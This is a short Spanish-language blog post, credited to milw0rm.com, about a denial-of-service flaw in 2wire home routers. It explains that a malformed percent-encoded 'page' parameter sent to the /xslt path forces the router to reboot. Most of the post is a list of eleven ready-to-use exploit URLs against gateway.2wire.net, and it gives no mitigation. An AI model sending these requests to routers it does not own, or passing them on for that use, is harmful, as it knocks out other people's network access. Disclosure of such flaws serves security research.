Existen varias vulnerabilidades en los routers 2wire unas muy simples otras muy preocupantes, en este caso recordaremos una que aun sigue vigente.
Se trata de la vulnerabilidad de ataque DOS, ya que se puede reiniciar con hacer una peticion a /xslt con el valor %X donde X es cualquier caracter que no es de la A-z. Ejemplo:
http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%%21!
http://gateway.2wire.net/xslt?page=%++
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%%27
http://gateway.2wire.net/xslt?page=%%7E
http://gateway.2wire.net/xslt?page=%**
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?
Entonces al entrar alguno de estos enlaces el router se reiniciará.
Fuente: milw0rm.com
Suscribirse a:
Enviar comentarios (Atom)
No hay comentarios:
Publicar un comentario